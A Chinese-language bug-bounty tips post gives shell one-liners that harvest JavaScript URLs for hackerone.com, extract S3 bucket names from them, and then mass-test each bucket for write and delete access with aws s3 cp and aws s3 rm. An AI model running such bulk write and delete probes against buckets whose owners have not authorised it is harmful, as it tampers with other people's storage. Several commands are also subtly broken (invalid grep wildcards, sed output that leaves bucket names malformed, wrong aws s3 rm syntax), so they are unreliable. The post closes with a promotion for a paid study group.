挖洞Bounty Tips | js中的敏感信息收集

• Subfinder https://github.com/projectdiscovery/subfinder

• httpx https://github.com/projectdiscovery/httpx

• gau https://github.com/lc/gau

• waybackurls https://github.com/tomnomnom/waybackurls

• subjs https://github.com/lc/subjs

• hakrawler https://github.com/hakluke/hakrawler

  
  

使用subfinder+subjs侦察根域名及子域名的js文件

subfinder -d hackerone.com silent | httpx |subjs >>vuljs.txt

使用gau 侦察根域名及子域名的js文件

gau --subs hackerone.com | grep ".js" >>vuljs.txt

使用waybackurls 侦察根域名及子域名的js文件

waybackurls hackerone.com | grep ".js" >>vuljs.txt

利用hakrawler侦察js

echo hackerone.com | httpx | hakrawler -subs | grep ".js"  >>vuljs.txt

还有几种 ，从已有url文件中侦察js

cat domain.txt | httpx | subjs >>vuljs.txt

cat domain.txt | waybackurls | grep ".js" >>vuljs.txt

cat domain.txt | httpx | hakrawler  | grep ".js" >>vuljs.txt

这样就得到了一大堆js文件了，可以尝试从这些js中用来提取各种敏感信息

使用xargs + curl提取信息

cat vuljs.txt | xargs -I% bash -c 'curl -sk "%" | grep -w "*.s3.amazonaws.com"' >> s3_bucket.txt

cat vuljs.txt | xargs -I% bash -c 'curl -sk "%" | grep -w "*.s3.us-east-2.amazonaws.com"' >> s3_bucket.txt

cat vuljs.txt | xargs -I% bash -c 'curl -sk "%" | grep -w "s3.amazonaws.com/*"' >> s3_bucket.txt

cat vuljs.txt | xargs -I% bash -c 'curl -sk "%" | grep -w "s3.us-east-2.amazonaws.com/*"' >> s3_bucket.txt

目前只有s3 aws 存储桶 url，需要从中收集s3 buck name，使用以下命令

cat s3_bucket.txt | sed 's/s3.amazonaws.com//' >> bucket_name.txt

cat s3_bucket.txt | sed 's/s3.us-east-2.amazonaws.com//' >> bucket_name.txt

收集到s3 存储桶保存在bucket_name.txt文件中

现在需要使用aws cli 命令，去跑一下哪些有权限写入或删除的桶，就能去HackerOne交洞了批量测试写入权限

cat bucket_name.txt |xargs -I% sh -c 'aws s3 cp test.txt s3://% 2>&1 | grep "upload" && echo "AWS s3 bucket takeover by cli %"'

删除权限测试

cat bucket_name.txt |xargs -I% sh -c 'aws s3 rm test.txt s3://%/test.txt 2>&1 | grep "delete" && echo "AWS s3 bucket takeover by cli %"'

先告一段落了，还有其他各种玩法 自己探索探索吧~

最后推荐下朋友小智的"BugBounty漏洞赏金自动化"知识星球

 还在等什么？赶紧点击下方名片关注学习吧！

原文始发于微信公众号（渗透测试网络安全）：挖洞Bounty Tips | js中的敏感信息收集